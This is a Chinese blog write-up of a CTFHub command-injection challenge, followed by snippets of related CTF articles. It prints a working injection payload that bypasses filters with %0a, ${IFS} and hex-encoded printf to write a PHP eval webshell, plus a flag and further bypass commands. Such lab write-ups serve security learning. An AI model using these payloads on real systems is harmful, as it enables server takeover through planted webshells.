CTFHUB RCE 命令注入最后一题(传马解)

最新推荐文章于 2024-04-18 21:45:16 发布
最新推荐文章于 2024-04-18 21:45:16 发布
阅读量582 收藏 3
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51250415/article/details/124910471
版权

CTFhub命令注入最后一题:传马结题

因为我直接通过cat查看不到,然后就尝试传马,慢慢尝试终于做出来了!

看了有用的点个赞,让我也骄傲下
首先看题目:
在这里插入图片描述因为我cat不得显示所以!传马!传的内容
在这里插入图片描述
一句话木马
现在晓得目的了,进行的就是整理下命令中的东西怎么绕

1、用${IFS}绕空格,//做了前面的都肯定知道

2、用%0a绕&和;   //因为%0a是换行

3、最后输出1.php文件用   >  符号

然后可以得出:

%0aecho${IFS}"<?php @eval($_POST['caidao'])?>">1.php

但是!中间的?php后面的空格成了问题,我想了好久都没办法,找到了一个文章结合他的方法(因为他不是传马,所以我才写的这个文章)

https://cloud.tencent.com/developer/article/1661505

然后就知道可以用过$(printf${IFS}" 16进制码 ")

马的16进制:

\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x63\x61\x69\x64\x61\x6F\x27\x5D\x29\x3F\x3E

一切东西准备好了!组合一起,然后传马:

?ip=%0aecho${IFS}$(printf${IFS}"\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x63\x61\x69\x64\x61\x6F\x27\x5D\x29\x3F\x3E")>1.php

在这里插入图片描述
访问1.php,感觉啥都没,这样就对了!然后菜刀连接!**(密码是:caidao,如果显示了内容那才会出问题)**当然想要显示内容加句:

highlight_file(__FILE__);

在这里插入图片描述
成功获取flag
在这里插入图片描述
希望不要直接拿去抄,看了自己背着做一遍。

ctfhub{7af0a3797dcef770cec93a17}

最后,做这个的一些东西!你们有没有想过

有没有想过直接通过:
cd flag_is_here;more fla*>1.txt
这样flag写到一个打开就可以直接显示的文件后缀名直接看,写到1.txt或者1.html来进行直接打开来访问?(我试了不行,他除了.php的文件,其他的都直接跳转到主页)

有没有想过直接打开打开flag.php文件?(我打开了,白的,因为php是动态语言,注释就不显示)
有没有想过

${IFS}和${printf ""}//这个到底是哪个地方执行的代码?${IFS}这个代码不能直接在shell直接当空格上用的!

如果有知道的给我留言解惑下。

musewasd1
关注
CTFHub-Web-RCE-eval执行题目解析
weixin_46168073的博客
11-15 1386
一、启动场景 点击web 点击RCE 点击eval执行。 开启题目,启动场景。注册会送1000个币,做一个题目消耗30,做完奖励100还是50,总之完全不用担心币的问题。 启动之后会出现一个链接,我们点击。 二、解题过程 这里会出现PHP代码。 我们使用蚁剑 。(安装之类的我会单独写一篇文章) 右键--->添加数据。 把URL复制到蚁剑,密码cmd 然后点击添加。 可以看到我们添加数据成功。 双击进...
CTFhub RCE 命令注入部分
qq_41497476的博客
07-01 1260
这种题其实已经比较熟悉了,使用 |,&&,;等分隔符对前面ping的内容进行隔断,然后执行自己的命令 任意值;ls 发现了除了目录下除了index.php外还有另一个php文件 输入 127.0.0.0;cat 21701615624125.php 发现确实多了个反馈的参数,但是看不到值,很疑惑后面知道了,这是因为cat命令反馈的值无法直接显示 这时有两个方法,一是直接查看源码 源码里是能看到的 第二个方法是直接把命令改为 127.0.0.1;cat 27712282015742.php.
CTFhub RCE解题思路
kindyyy的博客
05-16 471
命令注入——无过滤 先打开题目: 没有过滤
CTF web题目中怎么用写脚本的方法POST传参?——-利用python脚本
日熙的博客
07-14 4130
Python 提供了简单易用、功能强大的 HTTP 第三方开源库 Requests,帮助我们轻松解决关于 HTTP 的大部分问题。 在写python脚本之前必须得先导入requests模块哦,详细教程见:win10 python如何安装requests———超详细教程 下面就用题目Bugku web基础$_POST来做示范: 运行python程序,输入如下命令: import requests r = requests.post(‘http://123.206.87.240:8002/post/’, dat
ctfshowXXE
njh18790816639的博客
05-26 393
XXE(XML External Entity Injection) 全称为 XML 外部实体注入web373 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input');//以php伪协议接收一个值 if(isset($xmlfile)){ $dom = new DOMDocument();//创建内部类Document对象 $dom->l
ctf get post 传参 HackBar
热门推荐
weixin_44614983的博客
01-31 3万+
get和post是http协议的两种基本请求方式 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据 https://www.w3school.com.cn/tags/html_ref_httpmethods.asp 知乎上这篇更详细,关于get和post的区别 https://www.zhihu.com/question/28586791 web题中会遇到,比如...
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2207
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
CTFHub远程执行RCE
m0_57379855的博客
03-17 1287
CTFHub远程执行RCEeval执行命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习文件包含php://input远程包含读取源代码 eval执行 命令注入 127.0.0.1;cat 121931294031970.php 127.0.0.1;cat 121931294031970.php|base64 获得flag 过滤cat 其他查看文件的命令 127.0.0.1;ls 127.0.0.1;less flag_198392751413959.php|base
CTFHUB-WEB-RCE【08】命令注入
(∪.∪ )...zzz的博客
06-10 229
????命令注入源代码用IP传入IP&ls 查看文件IP&cat 查看内容过滤cat使用`\` `''` `""` `{任意无意义变量名}`等方法均可绕过过滤空格`$IFS` `$IFS$9` 重定向符`<`过滤目录分隔符; && 执行多条命令过滤运算符;综合过滤练习%0a 命令注入 源代码用IP传入 IP&ls 查看文件 1.1.1.1&ls IP&cat 查看内容 1.1.1.1&cat 7096156205265.php 过
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 1100
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 1万+
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
CTF下的命令执行
Lemon's blog
04-28 9718
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
CTFHub_技能树_WebRCE——“命令注入综合练习”
Ho1aAs‘s Blog
07-29 2754
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 最后一题来了个狠的,cat、flag还有各种符号都被过滤了 分隔符可以使用%0a代替 若直接使用文本框上传命令会导致字符被转义,直接访问URL /?ip=127.0.0.1%0als => 127.0.0.1;ls 查看目录 接下来要访问flag_is_here,需要绕过空格过滤、flag文字过滤并且显示文件夹的内容 (space) => $
ctfhubrce 通关笔记
最新发布
2301_80489197的博客
04-18 288
这里进行了对cat的过滤,通过preg_match_all()函数在变量ip和m中搜索“cat”字符串,如果里面没有“cat”字符串,则会进行ping命令。这一关将||和&给过滤了,但是还可以用其他没有被过滤的运算符进行拼接。通过反斜杠‘\’或者单引号进行绕过,也可以用tac命令来反向输出。先用ls查看一下当前目录下有那些文件,看到flag,去看一下。可以看到这一关是没有任何过滤的,所以可以直接用‘|’进行拼接。ping完后页面上什么也没有,但是在源码中可以看到flag。看到flag,再去看一下。
ctf赛题上传一个php木马,从一道CTF题学习PHP反序列化漏洞
weixin_33551941的博客
03-17 907
一、CTF题目前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下:class SoFun{protected $file='index.php';function __destruct(){if(!empty($this->file...
CTFshow-RCE极限大挑战
qq_63928796的博客
11-21 2159
ctfshow出的这五道rce感觉挺好玩的,但自己没做出几道来,所以来详细的复现一下,这几道题基本都是利用的自增,但长度逐渐缩短,雀氏极限。
WEB攻防-通用漏洞&RCE&代码执行&命令执行&多层面检测利用
m0_65336233的博客
10-18 1025
WEB攻防-通用漏洞&RCE&代码执行&命令执行&多层面检测利用
CTFWEB题——RCE
tomyyyyy
10-31 6412
CTFWEB题——RCE 目录CTFWEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
CTFSHOW每周大挑战——RCE
qq_61955196的博客
11-21 2875
ctfshow的每周大挑战之RCE的解题方法和一些问题的解决方法和个人总结。
ctfhub RCE
08-18
CTFHub RCE(Remote Code Execution)是指在CTFHub平台上利用漏洞或安全问题,远程执行恶意代码或命令的攻击行为。这种攻击通常会利用软件或网站存在的漏洞,通过远程执行代码来获取非授权的访问权限或对系统进行控制。 请注意,RCE是一种非法的攻击行为,严重侵犯了他人的隐私和系统安全。在任何情况下,我都不能提供关于如何进行RCE攻击的具体指导或支持。如果您对CTFHub或其他相关安全问题有任何合法的疑问或需求,请提供更具体的信息,我将尽力帮助您。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值